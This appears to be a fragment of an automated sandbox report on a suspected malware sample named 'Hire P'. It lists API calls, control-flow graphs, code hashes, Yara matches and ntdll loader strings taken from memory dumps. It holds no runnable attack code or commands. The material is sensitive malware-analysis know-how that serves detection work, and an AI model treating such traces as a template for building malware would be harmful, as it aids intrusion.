                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                            • Instruction ID: c58c7d579e4e2bacd6c01519c7e0221e1a66a8a060063ee453bb1f2e55cecb1d
                                                            • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                            • Instruction Fuzzy Hash: 67E0D632600204BBE220AA5AEC02F8BB3ACCBC5714F00401AFA0CA7242C270B91086F5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                                            • Instruction ID: 380b514f1b228bc081d75c17ae9254c2119d2321acb5c64e8da0945d2a3bd4e4
                                                            • Opcode Fuzzy Hash: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                                            • Instruction Fuzzy Hash: 9B90026224240003410971585514616900A97E1201B55C031E1015590DC72589916225
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                            • Instruction ID: 39b11356add0c70f76e2829180d6813ab33b9a01751b46f48a692bb2d15c2d5c
                                                            • Opcode Fuzzy Hash: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                            • Instruction Fuzzy Hash: 1390023224140413D11571585604707500997D1241F95C422A0425558DD7568A52A221
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                            • Instruction ID: 909fc2b4ca3a4550b39ab19aeeb864a5ab6787f159b2023eaaf7fb7357fa332a
                                                            • Opcode Fuzzy Hash: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                            • Instruction Fuzzy Hash: B390023224148803D1147158950474A500597D1301F59C421A4425658DC79589917221
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                                            • Instruction ID: 55df88d00419f574049992b3107e915872bca788882001add47234a10ace856d
                                                            • Opcode Fuzzy Hash: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                                            • Instruction Fuzzy Hash: 5390023264550403D10471585614706600597D1201F65C421A0425568DC7958A5166A2

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 0041409A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 0349A-n$0349A-n
                                                            • API String ID: 1836367815-3456940251
                                                            • Opcode ID: 6713828af27b9a14103d79dc9fc153ece541dbdb8ee11a634a09a0ce15b46ceb
                                                            • Instruction ID: 874110b21b3390a429e1172821fe310f6061561dc3fbdce207ccc568e88ba2fc
                                                            • Opcode Fuzzy Hash: 6713828af27b9a14103d79dc9fc153ece541dbdb8ee11a634a09a0ce15b46ceb
                                                            • Instruction Fuzzy Hash: 06115972E002587BDB119AE28C41DEFBB7DAF81358F04805AF90467241D2784E4747A5

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 0041409A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 0349A-n$0349A-n
                                                            • API String ID: 1836367815-3456940251
                                                            • Opcode ID: a67216cafba27e371a777059a0c701bbd68fdb8531e596d5aeb488d9f34b04ad
                                                            • Instruction ID: c1e20e2142e366b389da3563046297cec7b91a3900e043a758beaaf28deb081d
                                                            • Opcode Fuzzy Hash: a67216cafba27e371a777059a0c701bbd68fdb8531e596d5aeb488d9f34b04ad
                                                            • Instruction Fuzzy Hash: 0A01DB71E0021C7AEB10ABD19C81DEF7B7CEF81798F448069FA0467141D6785E0647A5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 30 413fdf-413feb 30->30 31 413fed-413ff0 30->31 32 414053-414055 31->32 33 413ff2-413ffc 31->33 34 41405b-41408d call 404743 call 424e93 32->34 35 414056 call 417793 32->35 33->32 40 4140ad-4140b3 34->40 41 41408f-41409e PostThreadMessageW 34->41 35->34 41->40 42 4140a0-4140aa 41->42 42->40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0349A-n$0349A-n
                                                            • API String ID: 0-3456940251
                                                            • Opcode ID: 47d999306225662355c300520733858812152cc495b1a1c6fad14eda91b693b9
                                                            • Instruction ID: bd3507925f1ca423312bb13a029e2d8f4e8582ed727c1f867d54eba86e7c9970
                                                            • Opcode Fuzzy Hash: 47d999306225662355c300520733858812152cc495b1a1c6fad14eda91b693b9
                                                            • Instruction Fuzzy Hash: 0A0147B6A01249BEDB105BA24C81CEF7B7DDED2758B048066F904E7241D6784E4647BA

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 43 42c993-42c9d4 call 4047d3 call 42d873 RtlFreeHeap
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C9CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID: =eA
                                                            • API String ID: 3298025750-3399696693
                                                            • Opcode ID: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                            • Instruction ID: 5bf54a144608e309584a604ebbd06080e81bb27e9496a35fdb293cb900648e28
                                                            • Opcode Fuzzy Hash: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                            • Instruction Fuzzy Hash: EDE065B66143047BD610EE9AEC45FAB33ACEFC9750F00441AFA19A7242D770BD118BB9

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 116 42c943-42c984 call 4047d3 call 42d873 RtlAllocateHeap
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,0041E57E,?,?,00000000,?,0041E57E,?,?,?), ref: 0042C97F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                            • Instruction ID: 6c94c9b0a68df69252c11d37fe3a6ed2ea0c874f6190d84ced6cb7a8f7b23c15
                                                            • Opcode Fuzzy Hash: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                            • Instruction Fuzzy Hash: 6EE06DB16042047BD610EE59DC81F9B37ADEFC5714F004019FA1CA7241C674B9108AB9

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 106 417786-4177d0 108 4177e0-4177f1 call 42dd83 106->108 109 4177d2-4177dd call 42fbc3 106->109 114 4177f3-417807 LdrLoadDll 108->114 115 41780a-41780d 108->115 109->108 114->115
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417805
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                            • Instruction ID: 5e67de2430df7b926fa19ab7142ee4ef2541c361e8587618277fac3dc212a9f4
                                                            • Opcode Fuzzy Hash: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                            • Instruction Fuzzy Hash: D8F0A7B5E04109ABCB11DBD0DC52FEEB7749F04304F108297F5189A280F535EB45CB55

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 126 42c9e3-42ca1c call 4047d3 call 42d873 ExitProcess
                                                            APIs
                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,089F3F9E,?,?,089F3F9E), ref: 0042CA17
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: fdc901fa64855fd1b6121672eb0d8bf45718e0c92ca995efb245744b1db379a0
                                                            • Instruction ID: 275eb0913eeab179cd74e56bdad212bd26511b8cc7a058f77c00c70800628c04
                                                            • Opcode Fuzzy Hash: fdc901fa64855fd1b6121672eb0d8bf45718e0c92ca995efb245744b1db379a0
                                                            • Instruction Fuzzy Hash: 6FE046766102147BD220BA9ADC41FDBB7ACDBC9754F00445AFA18A7242C7B0B91086EA

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 131 1102c0a-1102c0f 132 1102c11-1102c18 131->132 133 1102c1f-1102c26 LdrInitializeThunk 131->133
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
                                                            • Instruction ID: 667783eb17faf009446a6db66f3c8b2c6db4a6e8c89cde7a9fb29c8e752d30ae
                                                            • Opcode Fuzzy Hash: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
                                                            • Instruction Fuzzy Hash: 7BB09B72D415C5C6DA16E764570C717790077D1701F25C075D2030685F8778C1D1E275
                                                            Strings
                                                            • This failed because of error %Ix., xrefs: 01178EF6
                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01178DA3
                                                            • an invalid address, %p, xrefs: 01178F7F
                                                            • a NULL pointer, xrefs: 01178F90
                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01178DB5
                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01178D8C
                                                            • <unknown>, xrefs: 01178D2E, 01178D81, 01178E00, 01178E49, 01178EC7, 01178F3E
                                                            • The resource is owned exclusively by thread %p, xrefs: 01178E24
                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E86
                                                            • The resource is owned shared by %d threads, xrefs: 01178E2E
                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 01178E02
                                                            • *** enter .cxr %p for the context, xrefs: 01178FBD
                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01178DC4
                                                            • *** then kb to get the faulting stack, xrefs: 01178FCC
                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01178DD3
                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 01178F3F
                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E3F
                                                            • The critical section is owned by thread %p., xrefs: 01178E69
                                                            • *** enter .exr %p for the exception record, xrefs: 01178FA1
                                                            • *** Inpage error in %ws:%s, xrefs: 01178EC8
                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01178F34
                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01178F2D
                                                            • The instruction at %p tried to %s , xrefs: 01178F66
                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01178FEF
                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01178F26
                                                            • Go determine why that thread has not released the critical section., xrefs: 01178E75
                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01178E4B
                                                            • write to, xrefs: 01178F56
                                                            • The instruction at %p referenced memory at %p., xrefs: 01178EE2
                                                            • read from, xrefs: 01178F5D, 01178F62
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01135543
                                                            • corrupted critical section, xrefs: 011354C2
                                                            • undeleted critical section in freed memory, xrefs: 0113542B
                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0113540A, 01135496, 01135519
                                                            • Critical section debug info address, xrefs: 0113541F, 0113552E
                                                            • Thread identifier, xrefs: 0113553A
                                                            • Address of the debug info found in the active list., xrefs: 011354AE, 011354FA
                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354CE
                                                            • Critical section address., xrefs: 01135502
                                                            • 8, xrefs: 011352E3
                                                            • Invalid debug info address of this critical section, xrefs: 011354B6
                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354E2
                                                            • Critical section address, xrefs: 01135425, 011354BC, 01135534
                                                            • double initialized or corrupted critical section, xrefs: 01135508
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                            Strings
                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011325EB
                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01132409
                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01132602
                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0113261F
                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01132506
                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01132412
                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01132624
                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011324C0
                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011322E4
                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01132498
                                                            • @, xrefs: 0113259B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                            Strings
                                                            • VerifierFlags, xrefs: 01148C50
                                                            • VerifierDlls, xrefs: 01148CBD
                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01148A67
                                                            • VerifierDebug, xrefs: 01148CA5
                                                            • AVRF: -*- final list of providers -*- , xrefs: 01148B8F
                                                            • HandleTraces, xrefs: 01148C8F
                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01148A3D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                            Strings
                                                            • LdrpGenericExceptionFilter, xrefs: 01144DFC
                                                            • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01144E38
                                                            • minkernel\ntdll\ldrutil.c, xrefs: 01144E06
                                                            • Execute '.cxr %p' to dump context, xrefs: 01144EB1
                                                            • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01144DF5
                                                            • LdrpProtectedCopyMemory, xrefs: 01144DF4
                                                            • ***Exception thrown within loader***, xrefs: 01144E27
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01119A01
                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011199ED
                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01119A2A
                                                            • apphelp.dll, xrefs: 010B6496
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01119A11, 01119A3A
                                                            • LdrpInitShimEngine, xrefs: 011199F4, 01119A07, 01119A30
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • SXS: %s() passed the empty activation context, xrefs: 01132165
                                                            • RtlGetAssemblyStorageRoot, xrefs: 01132160, 0113219A, 011321BA
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01132178
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01132180
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011321BF
                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0113219F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                            Strings
                                                            • Loading import redirection DLL: '%wZ', xrefs: 01138170
                                                            • LdrpInitializeProcess, xrefs: 010FC6C4
                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 011381E5
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 010FC6C3
                                                            • LdrpInitializeImportRedirection, xrefs: 01138177, 011381EB
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01138181, 011381F5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                            APIs
                                                              • Part of subcall function 01102DF0: LdrInitializeThunk.NTDLL ref: 01102DFA
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BA3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BB6
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D60
